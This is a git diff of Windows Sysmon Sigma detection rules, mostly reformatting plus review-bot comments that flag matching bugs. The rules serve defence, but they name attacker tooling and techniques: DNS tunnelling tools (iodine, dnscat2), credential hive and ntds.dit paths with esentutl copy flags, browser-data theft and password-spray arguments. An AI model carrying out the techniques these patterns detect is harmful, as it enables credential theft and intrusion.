@@ -50,7 +50,6 @@ detection: - \Users\Public\ condition: process_creation and (all of selection_*) falsepositives: - - False positives may occur if you execute the script from one of the paths mentioned - in the rule. Apply additional filters that fits your org needs. + - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml b/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml index 1963a98e8..5ef12a0dd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml @@ -1,8 +1,7 @@ title: DLL Sideloading by VMware Xfer Utility id: ebea773c-a8f1-42ad-a856-00cb221966e8 status: test -description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the - non-default directory which may be an attempt to sideload arbitrary DLL +description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \VMwareXferlogs.exe - filter: + filter: # VMware might be installed in another path so update the rule accordingly Image|startswith: C:\Program Files\VMware\ condition: process_creation and (selection and not filter) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml index 4dc06c41a..b4a011f93 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml @@ -1,9 +1,7 @@ title: Dllhost.EXE Execution Anomaly id: e7888eb1-13b0-4616-bd99-4bc0c2b054b9 status: experimental -description: Detects a "dllhost" process spawning with no commandline arguments which - is very rare to happen and could indicate process injection activity or malware - mimicking similar system processes. +description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. references: - https://redcanary.com/blog/child-processes/ - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 @@ -24,11 +22,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \dllhost.exe - CommandLine: + CommandLine: - dllhost.exe - dllhost filter_main_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml index ed0789b93..baac98a38 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml @@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \iodine.exe - - Image|contains: \dnscat2 + - Image|endswith: \iodine.exe + - Image|contains: \dnscat2 condition: process_creation and selection falsepositives: - Unlikely 
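Review bot: `filter_main_null` is left as `CommandLine:` with no scalar in the dllhost detection hunk, which reads like an unfinished edit even though YAML resolves an empty value to null and the match for events that carry no command line is preserved. Keep the explicit form, `CommandLine: null`, or annotate the bare key, e.g. `CommandLine: # null - event recorded no command line`, so the intent survives the next automated reformat. The two neighbouring hunks on this line are whitespace and line-join changes only.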
diff --git a/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml index 7292714c4..f91e27482 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml @@ -1,9 +1,7 @@ title: Unusual Child Process of dns.exe id: a4e3d776-f12e-42c2-8510-9e6ed1f43ec3 status: test -description: Detects an unexpected process spawning from dns.exe which may indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html author: Tim Rauch diff --git a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml index efe321449..98644861e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml @@ -1,8 +1,7 @@ title: Potential Discovery Activity Via Dnscmd.EXE id: b6457d63-d2a2-4e29-859d-4e7affc153d1 status: test -description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones - of a domain. DNS zones used to host the DNS records for a particular domain. +description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records 
@@ -25,7 +24,7 @@ detection: selection_img: Image|endswith: \dnscmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - /enumrecords - /enumzones - /ZonePrint diff --git a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml index c332b6e5f..d7c8d5562 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml @@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 related: - - id: e61e8a88-59a9-451c-874e-70fcc9740d67 - type: derived - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived status: test -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html @@ -29,7 +27,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \dnscmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - /config - /serverlevelplugindll condition: process_creation and selection 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml index 4e2eee4d8..92cde1edb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dotnet-trace.exe - - OriginalFileName: dotnet-trace.dll + - Image|endswith: \dotnet-trace.exe + - OriginalFileName: dotnet-trace.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-- ' - collect condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml index 8a359a677..1280f9f4b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml @@ -1,11 +1,10 @@ title: Potential Recon Activity Using DriverQuery.EXE id: 9fc3072c-dc8f-4bf7-b231-18950000fadd related: - - id: a20def93-0709-4eae-9bd2-31206e21e6b2 - type: similar + - id: a20def93-0709-4eae-9bd2-31206e21e6b2 + type: similar status: experimental -description: Detect usage of the "driverquery" utility to perform reconnaissance on - installed drivers +description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ 
@@ -24,19 +23,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: driverquery.exe - - OriginalFileName: drvqry.exe + - Image|endswith: driverquery.exe + - OriginalFileName: drvqry.exe selection_parent: - - ParentImage|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentImage|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - ParentImage|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentImage|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by some scripts might trigger this as well diff --git a/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml index 91f7294c2..94df9cfbb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml @@ -1,11 +1,10 @@ title: DriverQuery.EXE Execution id: a20def93-0709-4eae-9bd2-31206e21e6b2 related: - - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd - type: similar + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + type: similar status: experimental -description: Detect usage of the "driverquery" utility. Which can be used to perform - reconnaissance on installed drivers +description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ 
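Review bot: `Image|endswith: driverquery.exe` in `selection_img` has no leading backslash, so any image name that merely ends in those characters also matches, whereas the sibling rules in this commit (dsacls, dsquery, dotnet-trace) anchor on `\name.exe`. Unless the omission is deliberate, change the line to `- Image|endswith: \driverquery.exe`. The same pattern appears in the driverquery_usage hunk that follows on the next line.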
@@ -24,21 +23,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: driverquery.exe - - OriginalFileName: drvqry.exe - filter_main_other: - - ParentImage|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentImage|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - Image|endswith: driverquery.exe + - OriginalFileName: drvqry.exe + filter_main_other: # These are covered in 9fc3072c-dc8f-4bf7-b231-18950000fadd to avoid duplicate alerting + - ParentImage|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentImage|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate use by third party tools in order to investigate installed drivers -level: medium +level: medium # Level could be reduced to low if this utility is often used in your environment ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml b/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml index 653f7d72e..fc1a3791f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml @@ -20,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - Image|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_flag: - CommandLine|contains: ' /G ' + CommandLine|contains: ' /G ' selection_permissions: - CommandLine|contains: + CommandLine|contains: # Add more permissions as you see fit in your environment - GR - GE - GW 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml b/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml index 64118a021..3b88064a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - Image|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/passwd:' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml b/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml index cd7ed64ff..dc261b192 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml @@ -1,8 +1,7 @@ title: Dism Remove Online Package id: 43e32da2-fdd0-4156-90de-50dfd62636f9 status: test -description: Deployment Image Servicing and Management tool. DISM is used to enumerate, - install, uninstall, configure, and update features and packages in Windows images +description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html 
@@ -25,11 +24,19 @@ detection: ParentCommandLine|contains|all: - /Online - /Disable-Feature + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet selection_dism: Image|endswith: \Dism.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Online - /Disable-Feature + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet condition: process_creation and (1 of selection_*) falsepositives: - Legitimate script diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml index fb8a1d2e8..2437945f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml @@ -1,10 +1,10 @@ title: Domain Trust Discovery Via Dsquery id: 3bad990e-4848-4a78-9530-b427d854aac0 related: - - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects execution of "dsquery.exe" for domain trust discovery references: @@ -25,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dsquery.exe - - OriginalFileName: dsquery.exe + - Image|endswith: \dsquery.exe + - OriginalFileName: dsquery.exe selection_cli: - CommandLine|contains: trustedDomain + CommandLine|contains: trustedDomain condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the utilities by legitimate user for legitimate reason diff --git a/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml index 7670005ec..952d53cec 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml @@ -1,8 +1,7 @@ title: Suspicious Kernel Dump Using Dtrace id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 status: test -description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, - which is available on Windows systems since Windows 10 19H1 +description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 references: - https://twitter.com/0gtweet/status/1474899714290208777?s=12 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace @@ -21,9 +20,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_plain: Image|endswith: \dtrace.exe - CommandLine|contains: lkd(0) + CommandLine|contains: lkd(0) selection_obfuscated: - CommandLine|contains|all: + CommandLine|contains|all: - syscall:::return - lkd( condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml index eac09ea47..d15fe0f70 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml @@ -1,8 +1,7 @@ title: DumpMinitool Execution id: dee0a7a3-f200-4112-a99b-952196d81e42 status: experimental -description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of - process memory via the use of the "MiniDumpWriteDump" +description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" references: - https://twitter.com/mrd0x/status/1511415432888131586 - https://twitter.com/mrd0x/status/1511489821247684615 
@@ -24,16 +23,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - Image|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' diff --git a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml index 1f38d5ecf..1ea8b93ea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml 
@@ -22,29 +22,28 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - Image|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe filter_folder: Image|contains: - \Microsoft Visual Studio\ - - \Extensions\ + - \Extensions\ # https://github.com/microsoft/vstest/blob/b2e2126f1aa7e5753cafe9515563c99ade6a59ce/src/package/nuspec/Microsoft.TestPlatform.Portable.nuspec#L159 susp_flags: - CommandLine|contains: .txt + CommandLine|contains: .txt cmd_has_flags: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' filter_cmd_misses_flags: - CommandLine|contains: --dumpType - condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags - or ( cmd_has_flags and not filter_cmd_misses_flags ) )) + CommandLine|contains: --dumpType + condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags and not filter_cmd_misses_flags ) )) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml b/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml index 9f71072db..e446a7c60 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml 
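Review bot: `filter_folder` lists two values under one `Image|contains`, which Sigma evaluates as OR, so any image path containing `\Extensions\` — not only one beneath a Visual Studio install — satisfies the filter and switches off the `not filter_folder` branch of the condition. If the new nuspec reference is meant to justify the per-user Visual Studio extensions folder, state that in the comment (e.g. `# VS per-user extensions folder, see nuspec reference`); if a stricter match is intended, `Image|contains|all` would require both fragments. The `susp_flags` and `cmd_has_flags` branches still fire regardless of path, so the effect is limited to the location-only alert.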
@@ -1,9 +1,7 @@ title: Esentutl Gather Credentials id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 status: test -description: Conti recommendation to its affiliates to use esentutl to access NTDS - dumped file. Trickbot also uses this utilities to get MSEdge info via its module - pwgrab. +description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. references: - https://twitter.com/vxunderground/status/1423336151860002816 - https://attack.mitre.org/software/S0404/ @@ -24,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - esentutl - ' /p' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml b/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml index 9150a11a3..e7d0d2750 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml @@ -1,8 +1,7 @@ title: Copying Sensitive Files with Credential Data id: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f status: test -description: Files with well-known filenames (sensitive files with credential data) - copying +description: Files with well-known filenames (sensitive files with credential data) copying references: - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment 
@@ -25,19 +24,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_esent_img: - - Image|endswith: \esentutl.exe - - OriginalFileName: \esentutl.exe + - Image|endswith: \esentutl.exe + - OriginalFileName: \esentutl.exe selection_esent_cli: - CommandLine|contains: + CommandLine|contains: - vss - ' /m ' - ' /y ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - \windows\ntds\ntds.dit - \config\sam - \config\security - - '\config\system ' + - '\config\system ' # space needed to avoid false positives with \config\systemprofile\ - \repair\sam - \repair\system - \repair\security @@ -46,7 +45,6 @@ detection: - \config\RegBack\security condition: process_creation and (all of selection_esent_* or selection_susp_paths) falsepositives: - - Copying sensitive files for legitimate use (eg. backup) or forensic investigation - by legitimate incident responder or forensic invetigator + - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml b/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml index 8742a5b58..f917c4011 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml 
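Review bot: `OriginalFileName: \esentutl.exe` in `selection_esent_img` carries a leading backslash, but OriginalFileName is the PE version-resource file name and holds no path separator, so this alternative can never match and the selection silently reduces to the `Image|endswith` check. The esentutl webcache rule in this same commit uses the correct form; change the line to `- OriginalFileName: esentutl.exe`. The condition in the following hunk, `all of selection_esent_* or selection_susp_paths`, also fires on any process whose command line names one of the listed files independently of esentutl, which looks intentional given the rule title but deserves a one-line comment on `selection_susp_paths`.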
@@ -1,8 +1,7 @@ title: Esentutl Steals Browser Information id: 6a69f62d-ce75-4b57-8dce-6351eb55b362 status: test -description: One way Qbot steals sensitive information is by extracting browser data - from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \esentutl.exe - - OriginalFileName: esentutl.exe + - Image|endswith: \esentutl.exe + - OriginalFileName: esentutl.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - /r - -r selection_webcache: - CommandLine|contains: \Windows\WebCache + CommandLine|contains: \Windows\WebCache condition: process_creation and (all of selection*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml index 262be54e3..ddba381d7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml 
@@ -1,11 +1,10 @@ title: Potentially Suspicious Event Viewer Child Process id: be344333-921d-4c4d-8bb8-e584cf584780 related: - - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 - type: derived + - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 + type: derived status: test -description: Detects uncommon or suspicious child processes of "eventvwr.exe" which - might indicate a UAC bypass attempt +description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 diff --git a/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml b/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml index 98295779d..c907f6a71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Cabinet File Expansion id: 9f107a84-532c-41af-b005-8d12a607639f status: test -description: Detects the expansion or decompression of cabinet files from potentially - suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks +description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks references: - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ 
@@ -22,11 +21,11 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_cmd:
 Image|endswith: \expand.exe
- CommandLine|contains:
+ CommandLine|contains:
 - '/F:'
 - '-F:'
 selection_folders_1:
- CommandLine|contains:
+ CommandLine|contains:
 - :\Perflogs\
 - :\Users\Public\
 - \Temporary Internet
@@ -35,20 +34,20 @@ detection:
 - \AppData\Roaming\Temp
 - :\Windows\Temp
 selection_folders_2:
- - CommandLine|contains|all:
- - :\Users\
- - \Favorites\
- - CommandLine|contains|all:
- - :\Users\
- - \Favourites\
- - CommandLine|contains|all:
- - :\Users\
- - \Contacts\
+ - CommandLine|contains|all:
+ - :\Users\
+ - \Favorites\
+ - CommandLine|contains|all:
+ - :\Users\
+ - \Favourites\
+ - CommandLine|contains|all:
+ - :\Users\
+ - \Contacts\
 filter_optional_dell:
+ # Launched by Dell ServiceShell.exe
 ParentImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe
- CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\
- condition: process_creation and (selection_cmd and 1 of selection_folders_* and
- not 1 of filter_optional_*)
+ CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\
+ condition: process_creation and (selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*)
 falsepositives:
 - System administrator Usage
 level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml b/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml
index 718f02a05..1251e9afc 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml
@@ -1,20 +1,15 @@
 title: Explorer Process Tree Break
 id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605
 status: test
-description: 'Detects a command line process that uses explorer.exe to launch arbitrary
- commands or binaries,
-
- which is similar to cmd.exe /c, only it breaks the process tree and makes its
- parent a new instance of explorer spawning from "svchost"
-
- '
+description: |
+ Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
+ which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
 references:
 - https://twitter.com/CyberRaiju/status/1273597319322058752
 - https://twitter.com/bohops/status/1276357235954909188?s=12
 - https://twitter.com/nas_bench/status/1535322450858233858
 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/
-author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems),
- @gott_cyber
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
 date: 2019/06/29
 modified: 2022/09/20
 tags:
@@ -29,10 +24,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
